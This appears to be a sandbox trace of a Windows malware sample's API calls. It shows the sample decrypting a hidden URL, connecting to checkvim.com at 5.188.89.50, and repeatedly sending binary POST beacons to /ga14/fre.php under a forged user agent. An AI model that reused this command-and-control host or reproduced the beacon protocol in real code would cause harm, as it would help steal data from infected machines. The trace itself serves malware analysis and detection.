ppResult=0x19f980 | out: ppResult=0x19f980*=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0313.255] GetProcessHeap () returned 0x840000 [0313.255] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c48 [0313.255] socket (af=2, type=1, protocol=6) returned 0x53c [0313.255] connect (s=0x53c, name=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0313.326] FreeAddrInfoW (pAddrInfo=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0313.326] GetProcessHeap () returned 0x840000 [0313.326] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0313.326] GetProcessHeap () returned 0x840000 [0313.326] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0313.326] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0313.327] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0313.327] GetProcessHeap () returned 0x840000 [0313.327] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0313.327] GetProcessHeap () returned 0x840000 [0313.327] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0313.327] GetProcessHeap () returned 0x840000 [0313.327] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f710 [0313.327] GetProcessHeap () returned 0x840000 [0313.327] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0313.328] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0313.329] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0313.329] GetProcessHeap () returned 0x840000 [0313.329] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0313.329] GetProcessHeap () returned 0x840000 [0313.329] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0313.329] send (s=0x53c, buf=0x873a58*, len=237, flags=0) returned 237 [0313.329] send (s=0x53c, buf=0x87eb58*, len=159, flags=0) returned 159 [0313.329] GetProcessHeap () returned 0x840000 [0313.329] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0313.329] recv (in: s=0x53c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0313.694] GetProcessHeap () returned 0x840000 [0313.694] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0313.694] GetProcessHeap () returned 0x840000 [0313.694] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0313.694] GetProcessHeap () returned 0x840000 [0313.694] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0313.694] GetProcessHeap () returned 0x840000 [0313.694] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0313.694] closesocket (s=0x53c) returned 0 [0313.694] GetProcessHeap () returned 0x840000 [0313.694] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c48 | out: hHeap=0x840000) returned 1 [0313.694] GetProcessHeap () returned 0x840000 [0313.694] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0313.694] GetProcessHeap () returned 0x840000 [0313.694] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcf8 | out: hHeap=0x840000) returned 1 [0313.694] GetProcessHeap () returned 0x840000 [0313.694] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0313.694] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x12f8) returned 0x53c [0313.696] Sleep (dwMilliseconds=0xea60) [0313.714] GetProcessHeap () returned 0x840000 [0313.714] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fcb0 [0313.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.715] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0313.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.722] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fdf8) returned 1 [0313.731] GetProcessHeap () returned 0x840000 [0313.731] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0313.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.732] CryptImportKey (in: hProv=0x86fdf8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6f0) returned 1 [0313.733] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.733] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0313.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.734] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0313.734] GetProcessHeap () returned 0x840000 [0313.734] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0313.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.735] CryptDecrypt (in: hKey=0x87e6f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fcb0, pdwDataLen=0x19f9a4 | out: pbData=0x87fcb0, pdwDataLen=0x19f9a4) returned 1 [0313.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.736] CryptDestroyKey (hKey=0x87e6f0) returned 1 [0313.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.737] CryptReleaseContext (hProv=0x86fdf8, dwFlags=0x0) returned 1 [0313.737] GetProcessHeap () returned 0x840000 [0313.737] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0313.738] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0313.738] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0313.739] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0313.740] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0313.743] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0313.743] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0313.744] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0313.744] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0313.744] GetProcessHeap () returned 0x840000 [0313.745] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0313.745] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0313.745] GetProcessHeap () returned 0x840000 [0313.745] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0313.745] GetProcessHeap () returned 0x840000 [0313.745] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0313.745] GetProcessHeap () returned 0x840000 [0313.745] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcb0 | out: hHeap=0x840000) returned 1 [0313.745] GetProcessHeap () returned 0x840000 [0313.745] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0313.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.746] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0313.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.751] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f8a8) returned 1 [0313.758] GetProcessHeap () returned 0x840000 [0313.758] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0313.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.759] CryptImportKey (in: hProv=0x86f8a8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e8f0) returned 1 [0313.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.760] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0313.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.761] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0313.761] GetProcessHeap () returned 0x840000 [0313.761] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0313.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.762] CryptDecrypt (in: hKey=0x87e8f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0313.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.763] CryptDestroyKey (hKey=0x87e8f0) returned 1 [0313.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.764] CryptReleaseContext (hProv=0x86f8a8, dwFlags=0x0) returned 1 [0313.764] GetProcessHeap () returned 0x840000 [0313.764] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0313.765] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0313.765] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0313.766] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0313.766] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0313.767] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0313.767] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0313.767] GetProcessHeap () returned 0x840000 [0313.767] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0313.768] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871420*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0313.769] GetProcessHeap () returned 0x840000 [0313.769] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bf8 [0313.769] socket (af=2, type=1, protocol=6) returned 0x540 [0313.769] connect (s=0x540, name=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0313.853] FreeAddrInfoW (pAddrInfo=0x871420*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0313.859] GetProcessHeap () returned 0x840000 [0313.859] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f798 [0313.859] GetProcessHeap () returned 0x840000 [0313.859] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0313.860] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0313.861] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0313.861] GetProcessHeap () returned 0x840000 [0313.861] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0313.862] GetProcessHeap () returned 0x840000 [0313.862] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0313.862] GetProcessHeap () returned 0x840000 [0313.862] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fea8 [0313.862] GetProcessHeap () returned 0x840000 [0313.862] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0313.862] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0313.863] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0313.863] GetProcessHeap () returned 0x840000 [0313.863] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0313.863] GetProcessHeap () returned 0x840000 [0313.863] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0313.863] send (s=0x540, buf=0x873a58*, len=237, flags=0) returned 237 [0313.864] send (s=0x540, buf=0x87eb58*, len=159, flags=0) returned 159 [0313.864] GetProcessHeap () returned 0x840000 [0313.864] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0313.864] recv (in: s=0x540, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0314.231] GetProcessHeap () returned 0x840000 [0314.231] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0314.231] GetProcessHeap () returned 0x840000 [0314.231] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0314.231] GetProcessHeap () returned 0x840000 [0314.231] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0314.231] GetProcessHeap () returned 0x840000 [0314.231] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f798 | out: hHeap=0x840000) returned 1 [0314.231] closesocket (s=0x540) returned 0 [0314.231] GetProcessHeap () returned 0x840000 [0314.231] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bf8 | out: hHeap=0x840000) returned 1 [0314.231] GetProcessHeap () returned 0x840000 [0314.231] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0314.231] GetProcessHeap () returned 0x840000 [0314.231] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0314.231] GetProcessHeap () returned 0x840000 [0314.231] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0314.231] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x2d4) returned 0x540 [0314.233] Sleep (dwMilliseconds=0xea60) [0314.238] GetProcessHeap () returned 0x840000 [0314.238] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f7a0 [0314.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.239] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0314.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.244] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fb50) returned 1 [0314.249] GetProcessHeap () returned 0x840000 [0314.249] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0314.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.250] CryptImportKey (in: hProv=0x86fb50, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e4f0) returned 1 [0314.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.251] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0314.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.252] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0314.252] GetProcessHeap () returned 0x840000 [0314.252] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0314.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.253] CryptDecrypt (in: hKey=0x87e4f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7a0, pdwDataLen=0x19f9a4 | out: pbData=0x87f7a0, pdwDataLen=0x19f9a4) returned 1 [0314.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.254] CryptDestroyKey (hKey=0x87e4f0) returned 1 [0314.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.255] CryptReleaseContext (hProv=0x86fb50, dwFlags=0x0) returned 1 [0314.255] GetProcessHeap () returned 0x840000 [0314.255] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0314.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0314.256] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0314.256] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0314.256] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0314.257] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0314.257] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0314.258] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0314.258] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0314.258] GetProcessHeap () returned 0x840000 [0314.258] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871510 [0314.258] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0314.258] GetProcessHeap () returned 0x840000 [0314.258] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871510 | out: hHeap=0x840000) returned 1 [0314.258] GetProcessHeap () returned 0x840000 [0314.258] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0314.258] GetProcessHeap () returned 0x840000 [0314.258] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0314.258] GetProcessHeap () returned 0x840000 [0314.258] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fdd0 [0314.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.259] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0314.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.264] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0314.269] GetProcessHeap () returned 0x840000 [0314.269] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0314.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.270] CryptImportKey (in: hProv=0x870128, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9b0) returned 1 [0314.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.270] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0314.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.271] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0314.271] GetProcessHeap () returned 0x840000 [0314.271] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0314.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.272] CryptDecrypt (in: hKey=0x87e9b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fdd0, pdwDataLen=0x19f9a4 | out: pbData=0x87fdd0, pdwDataLen=0x19f9a4) returned 1 [0314.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.273] CryptDestroyKey (hKey=0x87e9b0) returned 1 [0314.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0314.274] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0314.274] GetProcessHeap () returned 0x840000 [0314.274] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0314.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0314.274] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0314.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0314.275] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0314.276] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0314.276] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0314.276] GetProcessHeap () returned 0x840000 [0314.276] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0314.276] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0314.278] GetProcessHeap () returned 0x840000 [0314.278] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bc8 [0314.278] socket (af=2, type=1, protocol=6) returned 0x544 [0314.278] connect (s=0x544, name=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0314.352] FreeAddrInfoW (pAddrInfo=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0314.352] GetProcessHeap () returned 0x840000 [0314.352] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fce8 [0314.352] GetProcessHeap () returned 0x840000 [0314.352] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0314.353] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0314.353] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0314.354] GetProcessHeap () returned 0x840000 [0314.354] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 